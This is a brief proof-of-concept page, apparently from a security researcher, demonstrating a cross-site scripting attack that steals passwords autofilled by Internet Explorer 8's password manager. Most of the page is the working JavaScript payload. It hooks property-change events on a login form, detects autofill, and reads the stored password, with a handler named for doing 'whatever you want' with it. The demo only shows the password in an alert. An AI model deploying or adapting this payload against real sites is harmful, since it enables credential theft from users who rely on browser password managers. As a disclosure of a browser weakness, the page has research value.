XSS demo for stealing passwords from the IE8 password manager

A similar technique may work for Firefox, Safari, Chrome, Opera, etc. Your mileage may vary.

This is also a demo for stealing html from http://ha.ckers.org/weird/xss-password-manager.html ;)

1. Save a username / password in IE8's password manager by filling out the form below with fake data.

2. Click "Yes" when asked.

3. Then click back.

If successful, after inserting your fake username, the alert box should show your password.

THE XSS EXPLOIT PAYLOAD

<script>
var uL = 0;
var usingPasswordManager = 0;

// This checks if the user is writing his username entirely or only pressing
// the first letter and later selecting the user name from the list.
// It will not work if the user writes all the chars of his username.
function checkFirstUse() {
    if ((uL + 1 != u.value.length) && usingPasswordManager == 0)
        usingPasswordManager = 1;
    else
        uL++;
}

function doWhateverYouWantWithThePasswordNow() {
    if (usingPasswordManager == 1) {
        alert(document.login.thePassword.value);
        // We only need the password one time ;)
        p.detachEvent('onpropertychange', doWhateverYouWantWithThePasswordNow);
    }
}

function userIsWritingHisPassword() {
    u.detachEvent('onpropertychange', checkFirstUse);
}

var u = document.login.theUser;
var p = document.login.thePassword;
p.attachEvent('onpropertychange', doWhateverYouWantWithThePasswordNow);
u.attachEvent('onpropertychange', checkFirstUse);
p.attachEvent('onclick', userIsWritingHisPassword);
</script>